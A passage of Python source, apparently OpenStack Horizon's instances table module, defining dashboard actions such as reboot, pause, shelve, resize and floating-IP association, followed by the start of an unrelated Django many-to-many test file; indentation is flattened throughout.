def action(self, request, obj_id):
api.nova.server_delete(request, obj_id)
class RebootInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "reboot"
classes = ('btn-reboot',)
policy_rules = (("compute", "compute:reboot"),)
help_text = _("Restarted instances will lose any data"
" not saved in persistent storage.")
action_type = "danger"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Hard Reboot Instance",
u"Hard Reboot Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Hard Rebooted Instance",
u"Hard Rebooted Instances",
count
)
def allowed(self, request, instance=None):
if instance is not None:
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance))
else:
return True
def action(self, request, obj_id):
api.nova.server_reboot(request, obj_id, soft_reboot=False)
class SoftRebootInstance(RebootInstance):
name = "soft_reboot"
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Soft Reboot Instance",
u"Soft Reboot Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Soft Rebooted Instance",
u"Soft Rebooted Instances",
count
)
def action(self, request, obj_id):
api.nova.server_reboot(request, obj_id, soft_reboot=True)
class TogglePause(tables.BatchAction):
name = "pause"
icon = "pause"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Pause Instance",
u"Pause Instances",
count
),
ungettext_lazy(
u"Resume Instance",
u"Resume Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Paused Instance",
u"Paused Instances",
count
),
ungettext_lazy(
u"Resumed Instance",
u"Resumed Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('AdminActions',
request):
return False
if not instance:
return False
self.paused = instance.status == "PAUSED"
if self.paused:
self.current_present_action = UNPAUSE
policy_rules = (
("compute", "compute_extension:admin_actions:unpause"),)
else:
self.current_present_action = PAUSE
policy_rules = (
("compute", "compute_extension:admin_actions:pause"),)
has_permission = policy.check(
policy_rules, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission
and (instance.status in ACTIVE_STATES or self.paused)
and not is_deleting(instance))
def action(self, request, obj_id):
if self.paused:
api.nova.server_unpause(request, obj_id)
self.current_past_action = UNPAUSE
else:
api.nova.server_pause(request, obj_id)
self.current_past_action = PAUSE
class ToggleSuspend(tables.BatchAction):
name = "suspend"
classes = ("btn-suspend",)
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Suspend Instance",
u"Suspend Instances",
count
),
ungettext_lazy(
u"Resume Instance",
u"Resume Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Suspended Instance",
u"Suspended Instances",
count
),
ungettext_lazy(
u"Resumed Instance",
u"Resumed Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('AdminActions',
request):
return False
if not instance:
return False
self.suspended = instance.status == "SUSPENDED"
if self.suspended:
self.current_present_action = RESUME
policy_rules = (
("compute", "compute_extension:admin_actions:resume"),)
else:
self.current_present_action = SUSPEND
policy_rules = (
("compute", "compute_extension:admin_actions:suspend"),)
has_permission = policy.check(
policy_rules, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission
and (instance.status in ACTIVE_STATES or self.suspended)
and not is_deleting(instance))
def action(self, request, obj_id):
if self.suspended:
api.nova.server_resume(request, obj_id)
self.current_past_action = RESUME
else:
api.nova.server_suspend(request, obj_id)
self.current_past_action = SUSPEND
class ToggleShelve(tables.BatchAction):
name = "shelve"
icon = "shelve"
@staticmethod
def action_present(count):
return (
ungettext_lazy(
u"Shelve Instance",
u"Shelve Instances",
count
),
ungettext_lazy(
u"Unshelve Instance",
u"Unshelve Instances",
count
),
)
@staticmethod
def action_past(count):
return (
ungettext_lazy(
u"Shelved Instance",
u"Shelved Instances",
count
),
ungettext_lazy(
u"Unshelved Instance",
u"Unshelved Instances",
count
),
)
def allowed(self, request, instance=None):
if not api.nova.extension_supported('Shelve', request):
return False
if not instance:
return False
self.shelved = instance.status == "SHELVED_OFFLOADED"
if self.shelved:
self.current_present_action = UNSHELVE
policy_rules = (("compute", "compute_extension:unshelve"),)
else:
self.current_present_action = SHELVE
policy_rules = (("compute", "compute_extension:shelve"),)
has_permission = policy.check(
policy_rules, request,
target={'project_id': getattr(instance, 'tenant_id', None)})
return (has_permission
and (instance.status in ACTIVE_STATES or self.shelved)
and not is_deleting(instance))
def action(self, request, obj_id):
if self.shelved:
api.nova.server_unshelve(request, obj_id)
self.current_past_action = UNSHELVE
else:
api.nova.server_shelve(request, obj_id)
self.current_past_action = SHELVE
class LaunchLink(tables.LinkAction):
name = "launch"
verbose_name = _("Launch Instance")
url = "horizon:project:instances:launch"
classes = ("ajax-modal", "btn-launch")
icon = "cloud-upload"
policy_rules = (("compute", "compute:create"),)
ajax = True
def __init__(self, attrs=None, **kwargs):
kwargs['preempt'] = True
super(LaunchLink, self).__init__(attrs, **kwargs)
def allowed(self, request, datum):
try:
limits = api.nova.tenant_absolute_limits(request, reserved=True)
instances_available = limits['maxTotalInstances'] \
- limits['totalInstancesUsed']
cores_available = limits['maxTotalCores'] \
- limits['totalCoresUsed']
ram_available = limits['maxTotalRAMSize'] - limits['totalRAMUsed']
if instances_available <= 0 or cores_available <= 0 \
or ram_available <= 0:
if "disabled" not in self.classes:
self.classes = [c for c in self.classes] + ['disabled']
self.verbose_name = string_concat(self.verbose_name, ' ',
_("(Quota exceeded)"))
else:
self.verbose_name = _("Launch Instance")
classes = [c for c in self.classes if c != "disabled"]
self.classes = classes
except Exception:
LOG.exception("Failed to retrieve quota information")
# If we can't get the quota information, leave it to the
# API to check when launching
return True # The action should always be displayed
def single(self, table, request, object_id=None):
self.allowed(request, None)
return HttpResponse(self.render(is_table_action=True))
class LaunchLinkNG(LaunchLink):
name = "launch-ng"
url = "horizon:project:instances:index"
ajax = False
classes = ("btn-launch", )
def get_default_attrs(self):
url = urlresolvers.reverse(self.url)
ngclick = "modal.openLaunchInstanceWizard(" \
"{ successUrl: '%s' })" % url
self.attrs.update({
'ng-controller': 'LaunchInstanceModalController as modal',
'ng-click': ngclick
})
return super(LaunchLinkNG, self).get_default_attrs()
def get_link_url(self, datum=None):
return "javascript:void(0);"
class EditInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "edit"
verbose_name = _("Edit Instance")
url = "horizon:project:instances:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("compute", "compute:update"),)
def get_link_url(self, project):
return self._get_link_url(project, 'instance_info')
def _get_link_url(self, project, step_slug):
base_url = urlresolvers.reverse(self.url, args=[project.id])
next_url = self.table.get_full_url()
params = {"step": step_slug,
update_instance.UpdateInstance.redirect_param_name: next_url}
param = urlencode(params)
return "?".join([base_url, param])
def allowed(self, request, instance):
return not is_deleting(instance)
class EditInstanceSecurityGroups(EditInstance):
name = "edit_secgroups"
verbose_name = _("Edit Security Groups")
def get_link_url(self, project):
return self._get_link_url(project, 'update_security_groups')
def allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES and
not is_deleting(instance) and
request.user.tenant_id == instance.tenant_id)
class CreateSnapshot(policy.PolicyTargetMixin, tables.LinkAction):
name = "snapshot"
verbose_name = _("Create Snapshot")
url = "horizon:project:images:snapshots:create"
classes = ("ajax-modal",)
icon = "camera"
policy_rules = (("compute", "compute:snapshot"),)
def allowed(self, request, instance=None):
return instance.status in SNAPSHOT_READY_STATES \
and not is_deleting(instance)
class ConsoleLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "console"
verbose_name = _("Console")
url = "horizon:project:instances:detail"
classes = ("btn-console",)
policy_rules = (("compute", "compute_extension:consoles"),)
def allowed(self, request, instance=None):
# We check if ConsoleLink is allowed only if settings.CONSOLE_TYPE is
# not set at all, or if it's set to any value other than None or False.
return bool(getattr(settings, 'CONSOLE_TYPE', True)) and \
instance.status in ACTIVE_STATES and not is_deleting(instance)
def get_link_url(self, datum):
base_url = super(ConsoleLink, self).get_link_url(datum)
tab_query_string = tabs.ConsoleTab(
tabs.InstanceDetailTabs).get_query_string()
return "?".join([base_url, tab_query_string])
class LogLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "log"
verbose_name = _("View Log")
url = "horizon:project:instances:detail"
classes = ("btn-log",)
policy_rules = (("compute", "compute_extension:console_output"),)
def allowed(self, request, instance=None):
return instance.status in ACTIVE_STATES and not is_deleting(instance)
def get_link_url(self, datum):
base_url = super(LogLink, self).get_link_url(datum)
tab_query_string = tabs.LogTab(
tabs.InstanceDetailTabs).get_query_string()
return "?".join([base_url, tab_query_string])
class ResizeLink(policy.PolicyTargetMixin, tables.LinkAction):
name = "resize"
verbose_name = _("Resize Instance")
url = "horizon:project:instances:resize"
classes = ("ajax-modal", "btn-resize")
policy_rules = (("compute", "compute:resize"),)
def get_link_url(self, project):
return self._get_link_url(project, 'flavor_choice')
def _get_link_url(self, project, step_slug):
base_url = urlresolvers.reverse(self.url, args=[project.id])
next_url = self.table.get_full_url()
params = {"step": step_slug,
resize_instance.ResizeInstance.redirect_param_name: next_url}
param = urlencode(params)
return "?".join([base_url, param])
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance))
class ConfirmResize(policy.PolicyTargetMixin, tables.Action):
name = "confirm"
verbose_name = _("Confirm Resize/Migrate")
classes = ("btn-confirm", "btn-action-required")
policy_rules = (("compute", "compute:confirm_resize"),)
def allowed(self, request, instance):
return instance.status == 'VERIFY_RESIZE'
def single(self, table, request, instance):
api.nova.server_confirm_resize(request, instance)
class RevertResize(policy.PolicyTargetMixin, tables.Action):
name = "revert"
verbose_name = _("Revert Resize/Migrate")
classes = ("btn-revert", "btn-action-required")
policy_rules = (("compute", "compute:revert_resize"),)
def allowed(self, request, instance):
return instance.status == 'VERIFY_RESIZE'
def single(self, table, request, instance):
api.nova.server_revert_resize(request, instance)
class RebuildInstance(policy.PolicyTargetMixin, tables.LinkAction):
name = "rebuild"
verbose_name = _("Rebuild Instance")
classes = ("btn-rebuild", "ajax-modal")
url = "horizon:project:instances:rebuild"
policy_rules = (("compute", "compute:rebuild"),)
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
class DecryptInstancePassword(tables.LinkAction):
name = "decryptpassword"
verbose_name = _("Retrieve Password")
classes = ("btn-decrypt", "ajax-modal")
url = "horizon:project:instances:decryptpassword"
def allowed(self, request, instance):
enable = getattr(settings,
'OPENSTACK_ENABLE_PASSWORD_RETRIEVE',
False)
return (enable
and (instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance)
and get_keyname(instance) is not None)
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
keypair_name = get_keyname(datum)
return urlresolvers.reverse(self.url, args=[instance_id,
keypair_name])
class AssociateIP(policy.PolicyTargetMixin, tables.LinkAction):
name = "associate"
verbose_name = _("Associate Floating IP")
url = "horizon:project:access_and_security:floating_ips:associate"
classes = ("ajax-modal",)
icon = "link"
policy_rules = (("compute", "network:associate_floating_ip"),)
def allowed(self, request, instance):
if not api.network.floating_ip_supported(request):
return False
if api.network.floating_ip_simple_associate_supported(request):
return False
if instance.status == "ERROR":
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "floating":
return False
return not is_deleting(instance)
def get_link_url(self, datum):
base_url = urlresolvers.reverse(self.url)
next_url = self.table.get_full_url()
params = {
"instance_id": self.table.get_object_id(datum),
workflows.IPAssociationWorkflow.redirect_param_name: next_url}
params = urlencode(params)
return "?".join([base_url, params])
class SimpleAssociateIP(policy.PolicyTargetMixin, tables.Action):
name = "associate-simple"
verbose_name = _("Associate Floating IP")
icon = "link"
policy_rules = (("compute", "network:associate_floating_ip"),)
def allowed(self, request, instance):
if not api.network.floating_ip_simple_associate_supported(request):
return False
if instance.status == "ERROR":
return False
return not is_deleting(instance)
def single(self, table, request, instance_id):
try:
# target_id is port_id for Neutron and instance_id for Nova Network
# (Neutron API wrapper returns a 'portid_fixedip' string)
target_id = api.network.floating_ip_target_get_by_instance(
request, instance_id).split('_')[0]
fip = api.network.tenant_floating_ip_allocate(request)
api.network.floating_ip_associate(request, fip.id, target_id)
messages.success(request,
_("Successfully associated floating IP: %s")
% fip.ip)
except Exception:
exceptions.handle(request,
_("Unable to associate floating IP."))
return shortcuts.redirect(request.get_full_path())
class SimpleDisassociateIP(policy.PolicyTargetMixin, tables.Action):
name = "disassociate"
verbose_name = _("Disassociate Floating IP")
classes = ("btn-disassociate",)
policy_rules = (("compute", "network:disassociate_floating_ip"),)
action_type = "danger"
def allowed(self, request, instance):
if not api.network.floating_ip_supported(request):
return False
if not conf.HORIZON_CONFIG["simple_ip_management"]:
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "floating":
return not is_deleting(instance)
return False
def single(self, table, request, instance_id):
try:
# target_id is port_id for Neutron and instance_id for Nova Network
# (Neutron API wrapper returns a 'portid_fixedip' string)
targets = api.network.floating_ip_target_list_by_instance(
request, instance_id)
target_ids = [t.split('_')[0] for t in targets]
fips = [fip for fip in api.network.tenant_floating_ip_list(request)
if fip.port_id in target_ids]
# Removing multiple floating IPs at once doesn't work, so this pops
# off the first one.
if fips:
fip = fips.pop()
api.network.floating_ip_disassociate(request, fip.id)
messages.success(request,
_("Successfully disassociated "
"floating IP: %s") % fip.ip)
else:
messages.info(request, _("No floating IPs to disassociate."))
except Exception:
exceptions.handle(request,
_("Unable to disassociate floating IP."))
return shortcuts.redirect(request.get_full_path())
class UpdateMetadata(policy.PolicyTargetMixin, tables.LinkAction):
name = "update_metadata"
verbose_name = _("Update Metadata")
ajax = False
icon = "pencil"
attrs = {"ng-controller": "MetadataModalHelperController as modal"}
policy_rules = (("compute", "compute:update_instance_metadata"),)
def __init__(self, attrs=None, **kwargs):
kwargs['preempt'] = True
super(UpdateMetadata, self).__init__(attrs, **kwargs)
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
self.attrs['ng-click'] = (
"modal.openMetadataModal('instance', '%s', true, 'metadata')"
% instance_id)
return "javascript:void(0);"
def allowed(self, request, instance=None):
return (instance and
instance.status.lower() != 'error')
def instance_fault_to_friendly_message(instance):
fault = getattr(instance, 'fault', {})
message = fault.get('message', _("Unknown"))
default_message = _("Please try again later [Error: %s].") % message
fault_map = {
'NoValidHost': _("There is not enough capacity for this "
"flavor in the selected availability zone. "
"Try again later or select a different availability "
"zone.")
}
return fault_map.get(message, default_message)
def get_instance_error(instance):
if instance.status.lower() != 'error':
return None
message = instance_fault_to_friendly_message(instance)
preamble = _('Failed to perform requested operation on instance "%s", the '
'instance has an error status') % instance.name or instance.id
message = string_concat(preamble, ': ', message)
return message
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, instance_id):
instance = api.nova.server_get(request, instance_id)
try:
instance.full_flavor = api.nova.flavor_get(request,
instance.flavor["id"])
except Exception:
exceptions.handle(request,
_('Unable to retrieve flavor information '
'for instance "%s".') % instance_id,
ignore=True)
try:
api.network.servers_update_addresses(request, [instance])
except Exception:
exceptions.handle(request,
_('Unable to retrieve Network information '
'for instance "%s".') % instance_id,
ignore=True)
error = get_instance_error(instance)
if error:
messages.error(request, error)
return instance
class StartInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "start"
classes = ('btn-confirm',)
policy_rules = (("compute", "compute:start"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Start Instance",
u"Start Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Started Instance",
u"Started Instances",
count
)
def allowed(self, request, instance):
return ((instance is None) or
(instance.status in ("SHUTDOWN", "SHUTOFF", "CRASHED")))
def action(self, request, obj_id):
api.nova.server_start(request, obj_id)
class StopInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "stop"
policy_rules = (("compute", "compute:stop"),)
help_text = _("The instance(s) will be shut off.")
action_type = "danger"
@staticmethod
def action_present(count):
return npgettext_lazy(
"Action to perform (the instance is currently running)",
u"Shut Off Instance",
u"Shut Off Instances",
count
)
@staticmethod
def action_past(count):
return npgettext_lazy(
"Past action (the instance is currently already Shut Off)",
u"Shut Off Instance",
u"Shut Off Instances",
count
)
def allowed(self, request, instance):
return ((instance is None)
or ((get_power_state(instance) in ("RUNNING", "SUSPENDED"))
and not is_deleting(instance)))
def action(self, request, obj_id):
api.nova.server_stop(request, obj_id)
class LockInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "lock"
policy_rules = (("compute", "compute_extension:admin_actions:lock"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Lock Instance",
u"Lock Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Locked Instance",
u"Locked Instances",
count
)
# to only allow unlocked instances to be locked
def allowed(self, request, instance):
# if not locked, lock should be available
if getattr(instance, 'locked', False):
return False
if not api.nova.extension_supported('AdminActions', request):
return False
return True
def action(self, request, obj_id):
api.nova.server_lock(request, obj_id)
class UnlockInstance(policy.PolicyTargetMixin, tables.BatchAction):
name = "unlock"
policy_rules = (("compute", "compute_extension:admin_actions:unlock"),)
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Unlock Instance",
u"Unlock Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Unlocked Instance",
u"Unlocked Instances",
count
)
# to only allow locked instances to be unlocked
def allowed(self, request, instance):
if not getattr(instance, 'locked', True):
return False
if not api.nova.extension_supported('AdminActions', request):
return False
return True
def action(self, request, obj_id):
api.nova.server_unlock(request, obj_id)
class AttachVolume(tables.LinkAction):
name = "attach_volume"
verbose_name = _("Attach Volume")
url = "horizon:project:instances:attach_volume"
classes = ("ajax-modal",)
policy_rules = (("compute", "compute:attach_volume"),)
# This action should be disabled if the instance
# is not active, or the instance is being deleted
def allowed(self, request, instance=None):
return instance.status in ("ACTIVE") \
and not is_deleting(instance)
class DetachVolume(AttachVolume):
name = "detach_volume"
verbose_name = _("Detach Volume")
url = "horizon:project:instances:detach_volume"
policy_rules = (("compute", "compute:detach_volume"),)
# This action should be disabled if the instance
# is not active, or the instance is being deleted
def allowed(self, request, instance=None):
return instance.status in ("ACTIVE") \
and not is_deleting(instance)
class AttachInterface(policy.PolicyTargetMixin, tables.LinkAction):
name = "attach_interface"
verbose_name = _("Attach Interface")
classes = ("btn-confirm", "ajax-modal")
url = "horizon:project:instances:attach_interface"
policy_rules = (("compute", "compute_extension:attach_interfaces"),)
def allowed(self, request, instance):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF')
and not is_deleting(instance)
and api.base.is_service_enabled(request, 'network'))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
# TODO(lyj): the policy for detach interface not exists in nova.json,
# once it's added, it should be added here.
class DetachInterface(policy.PolicyTargetMixin, tables.LinkAction):
name = "detach_interface"
verbose_name = _("Detach Interface")
classes = ("btn-confirm", "ajax-modal")
url = "horizon:project:instances:detach_interface"
def allowed(self, request, instance):
if not api.base.is_service_enabled(request, 'network'):
return False
if is_deleting(instance):
return False
if (instance.status not in ACTIVE_STATES and
instance.status != 'SHUTOFF'):
return False
for addresses in instance.addresses.values():
for address in addresses:
if address.get('OS-EXT-IPS:type') == "fixed":
return True
return False
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
def get_ips(instance):
template_name = 'project/instances/_instance_ips.html'
ip_groups = {}
for ip_group, addresses in six.iteritems(instance.addresses):
ip_groups[ip_group] = {}
ip_groups[ip_group]["floating"] = []
ip_groups[ip_group]["non_floating"] = []
for address in addresses:
if ('OS-EXT-IPS:type' in address and
address['OS-EXT-IPS:type'] == "floating"):
ip_groups[ip_group]["floating"].append(address)
else:
ip_groups[ip_group]["non_floating"].append(address)
context = {
"ip_groups": ip_groups,
}
return template.loader.render_to_string(template_name, context)
def get_size(instance):
if hasattr(instance, "full_flavor"):
template_name = 'project/instances/_instance_flavor.html'
size_ram = sizeformat.mb_float_format(instance.full_flavor.ram)
if instance.full_flavor.disk > 0:
size_disk = sizeformat.diskgbformat(instance.full_flavor.disk)
else:
size_disk = _("%s GB") % "0"
context = {
"name": instance.full_flavor.name,
"id": instance.id,
"size_disk": size_disk,
"size_ram": size_ram,
"vcpus": instance.full_flavor.vcpus,
"flavor_id": instance.full_flavor.id
}
return template.loader.render_to_string(template_name, context)
return _("Not available")
def get_keyname(instance):
if hasattr(instance, "key_name"):
keyname = instance.key_name
return keyname
return _("Not available")
def get_power_state(instance):
return POWER_STATES.get(getattr(instance, "OS-EXT-STS:power_state", 0), '')
STATUS_DISPLAY_CHOICES = (
("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
("active", pgettext_lazy("Current status of an Instance", u"Active")),
("shutoff", pgettext_lazy("Current status of an Instance", u"Shutoff")),
("suspended", pgettext_lazy("Current status of an Instance",
u"Suspended")),
("paused", pgettext_lazy("Current status of an Instance", u"Paused")),
("error", pgettext_lazy("Current status of an Instance", u"Error")),
("resize", pgettext_lazy("Current status of an Instance",
u"Resize/Migrate")),
("verify_resize", pgettext_lazy("Current status of an Instance",
u"Confirm or Revert Resize/Migrate")),
("revert_resize", pgettext_lazy(
"Current status of an Instance", u"Revert Resize/Migrate")),
("reboot", pgettext_lazy("Current status of an Instance", u"Reboot")),
("hard_reboot", pgettext_lazy("Current status of an Instance",
u"Hard Reboot")),
("password", pgettext_lazy("Current status of an Instance", u"Password")),
("rebuild", pgettext_lazy("Current status of an Instance", u"Rebuild")),
("migrating", pgettext_lazy("Current status of an Instance",
u"Migrating")),
("build", pgettext_lazy("Current status of an Instance", u"Build")),
("rescue", pgettext_lazy("Current status of an Instance", u"Rescue")),
("soft-delete", pgettext_lazy("Current status of an Instance",
u"Soft Deleted")),
("shelved", pgettext_lazy("Current status of an Instance", u"Shelved")),
("shelved_offloaded", pgettext_lazy("Current status of an Instance",
u"Shelved Offloaded")),
# these vm states are used when generating CSV usage summary
("building", pgettext_lazy("Current status of an Instance", u"Building")),
("stopped", pgettext_lazy("Current status of an Instance", u"Stopped")),
("rescued", pgettext_lazy("Current status of an Instance", u"Rescued")),
("resized", pgettext_lazy("Current status of an Instance", u"Resized")),
)
TASK_DISPLAY_NONE = pgettext_lazy("Task status of an Instance", u"None")
# Mapping of task states taken from Nova's nova/compute/task_states.py
TASK_DISPLAY_CHOICES = (
("scheduling", pgettext_lazy("Task status of an Instance",
u"Scheduling")),
("block_device_mapping", pgettext_lazy("Task status of an Instance",
u"Block Device Mapping")),
("networking", pgettext_lazy("Task status of an Instance",
u"Networking")),
("spawning", pgettext_lazy("Task status of an Instance", u"Spawning")),
("image_snapshot", pgettext_lazy("Task status of an Instance",
u"Snapshotting")),
("image_snapshot_pending", pgettext_lazy("Task status of an Instance",
u"Image Snapshot Pending")),
("image_pending_upload", pgettext_lazy("Task status of an Instance",
u"Image Pending Upload")),
("image_uploading", pgettext_lazy("Task status of an Instance",
u"Image Uploading")),
("image_backup", pgettext_lazy("Task status of an Instance",
u"Image Backup")),
("updating_password", pgettext_lazy("Task status of an Instance",
u"Updating Password")),
("resize_prep", pgettext_lazy("Task status of an Instance",
u"Preparing Resize or Migrate")),
("resize_migrating", pgettext_lazy("Task status of an Instance",
u"Resizing or Migrating")),
("resize_migrated", pgettext_lazy("Task status of an Instance",
u"Resized or Migrated")),
("resize_finish", pgettext_lazy("Task status of an Instance",
u"Finishing Resize or Migrate")),
("resize_reverting", pgettext_lazy("Task status of an Instance",
u"Reverting Resize or Migrate")),
("resize_confirming", pgettext_lazy("Task status of an Instance",
u"Confirming Resize or Migrate")),
("rebooting", pgettext_lazy("Task status of an Instance", u"Rebooting")),
("reboot_pending", pgettext_lazy("Task status of an Instance",
u"Reboot Pending")),
("reboot_started", pgettext_lazy("Task status of an Instance",
u"Reboot Started")),
("rebooting_hard", pgettext_lazy("Task status of an Instance",
u"Hard Rebooting")),
("reboot_pending_hard", pgettext_lazy("Task status of an Instance",
u"Hard Reboot Pending")),
("reboot_started_hard", pgettext_lazy("Task status of an Instance",
u"Hard Reboot Started")),
("pausing", pgettext_lazy("Task status of an Instance", u"Pausing")),
("unpausing", pgettext_lazy("Task status of an Instance", u"Resuming")),
("suspending", pgettext_lazy("Task status of an Instance",
u"Suspending")),
("resuming", pgettext_lazy("Task status of an Instance", u"Resuming")),
("powering-off", pgettext_lazy("Task status of an Instance",
u"Powering Off")),
("powering-on", pgettext_lazy("Task status of an Instance",
u"Powering On")),
("rescuing", pgettext_lazy("Task status of an Instance", u"Rescuing")),
("unrescuing", pgettext_lazy("Task status of an Instance",
u"Unrescuing")),
("rebuilding", pgettext_lazy("Task status of an Instance",
u"Rebuilding")),
("rebuild_block_device_mapping", pgettext_lazy(
"Task status of an Instance", u"Rebuild Block Device Mapping")),
("rebuild_spawning", pgettext_lazy("Task status of an Instance",
u"Rebuild Spawning")),
("migrating", pgettext_lazy("Task status of an Instance", u"Migrating")),
("deleting", pgettext_lazy("Task status of an Instance", u"Deleting")),
("soft-deleting", pgettext_lazy("Task status of an Instance",
u"Soft Deleting")),
("restoring", pgettext_lazy("Task status of an Instance", u"Restoring")),
("shelving", pgettext_lazy("Task status of an Instance", u"Shelving")),
("shelving_image_pending_upload", pgettext_lazy(
"Task status of an Instance", u"Shelving Image Pending Upload")),
("shelving_image_uploading", pgettext_lazy("Task status of an Instance",
u"Shelving Image Uploading")),
("shelving_offloading", pgettext_lazy("Task status of an Instance",
u"Shelving Offloading")),
("unshelving", pgettext_lazy("Task status of an Instance",
u"Unshelving")),
)
POWER_DISPLAY_CHOICES = (
("NO STATE", pgettext_lazy("Power state of an Instance", u"No State")),
("RUNNING", pgettext_lazy("Power state of an Instance", u"Running")),
("BLOCKED", pgettext_lazy("Power state of an Instance", u"Blocked")),
("PAUSED", pgettext_lazy("Power state of an Instance", u"Paused")),
("SHUTDOWN", pgettext_lazy("Power state of an Instance", u"Shut Down")),
("SHUTOFF", pgettext_lazy("Power state of an Instance", u"Shut Off")),
("CRASHED", pgettext_lazy("Power state of an Instance", u"Crashed")),
("SUSPENDED", pgettext_lazy("Power state of an Instance", u"Suspended")),
("FAILED", pgettext_lazy("Power state of an Instance", u"Failed")),
("BUILDING", pgettext_lazy("Power state of an Instance", u"Building")),
)
INSTANCE_FILTER_CHOICES = (
('uuid', _("Instance ID ="), True),
('name', _("Instance Name"), True),
('image', _("Image ID ="), True),
('image_name', _("Image Name ="), True),
('ip', _("IPv4 Address"), True),
('ip6', _("IPv6 Address"), True),
('flavor', _("Flavor ID ="), True),
('flavor_name', _("Flavor Name ="), True),
('key_name', _("Key Pair Name"), True),
('status', _("Status ="), True),
('availability_zone', _("Availability Zone"), True),
('changes-since', _("Changes Since"), True,
_("Filter by an ISO 8061 formatted time, e.g. 2016-06-14T06:27:59Z")),
('vcpus', _("vCPUs ="), True),
)
class InstancesFilterAction(tables.FilterAction):
filter_type = "server"
filter_choices = INSTANCE_FILTER_CHOICES
class InstancesTable(tables.DataTable):
TASK_STATUS_CHOICES = (
(None, True),
("none", True)
)
STATUS_CHOICES = (
("active", True),
("shutoff", True),
("suspended", True),
("paused", True),
("error", False),
("rescue", True),
("shelved", True),
("shelved_offloaded", True),
)
name = tables.WrappingColumn("name",
link="horizon:project:instances:detail",
verbose_name=_("Instance Name"))
image_name = tables.Column("image_name",
verbose_name=_("Image Name"))
ip = tables.Column(get_ips,
verbose_name=_("IP Address"),
attrs={'data-type': "ip"})
size = tables.Column(get_size, sortable=False, verbose_name=_("Size"))
keypair = tables.Column(get_keyname, verbose_name=_("Key Pair"))
status = tables.Column("status",
filters=(title, filters.replace_underscores),
verbose_name=_("Status"),
status=True,
status_choices=STATUS_CHOICES,
display_choices=STATUS_DISPLAY_CHOICES)
az = tables.Column("availability_zone",
verbose_name=_("Availability Zone"))
task = tables.Column("OS-EXT-STS:task_state",
verbose_name=_("Task"),
empty_value=TASK_DISPLAY_NONE,
status=True,
status_choices=TASK_STATUS_CHOICES,
display_choices=TASK_DISPLAY_CHOICES)
state = tables.Column(get_power_state,
filters=(title, filters.replace_underscores),
verbose_name=_("Power State"),
display_choices=POWER_DISPLAY_CHOICES)
created = tables.Column("created",
verbose_name=_("Time since created"),
filters=(filters.parse_isotime,
filters.timesince_sortable),
attrs={'data-type': 'timesince'})
class Meta(object):
name = "instances"
verbose_name = _("Instances")
status_columns = ["status", "task"]
row_class = UpdateRow
table_actions_menu = (StartInstance, StopInstance, SoftRebootInstance)
launch_actions = ()
if getattr(settings, 'LAUNCH_INSTANCE_LEGACY_ENABLED', False):
launch_actions = (LaunchLink,) + launch_actions
if getattr(settings, 'LAUNCH_INSTANCE_NG_ENABLED', True):
launch_actions = (LaunchLinkNG,) + launch_actions
table_actions = launch_actions + (DeleteInstance,
InstancesFilterAction)
row_actions = (StartInstance, ConfirmResize, RevertResize,
CreateSnapshot, SimpleAssociateIP, AssociateIP,
SimpleDisassociateIP, AttachInterface,
DetachInterface, EditInstance, AttachVolume,
DetachVolume, UpdateMetadata, DecryptInstancePassword,
EditInstanceSecurityGroups, ConsoleLink, LogLink,
TogglePause, ToggleSuspend, ToggleShelve,
ResizeLink, LockInstance, UnlockInstance,
SoftRebootInstance, RebootInstance,
StopInstance, RebuildInstance, DeleteInstance)
| |
from __future__ import unicode_literals
from datetime import datetime
from operator import attrgetter
from django.test import TestCase
from .models import (Person, Group, Membership, CustomMembership,
PersonSelfRefM2M, Friendship)
class M2mThroughTests(TestCase):
def setUp(self):
self.bob = Person.objects.create(name='Bob')
self.jim = Person.objects.create(name='Jim')
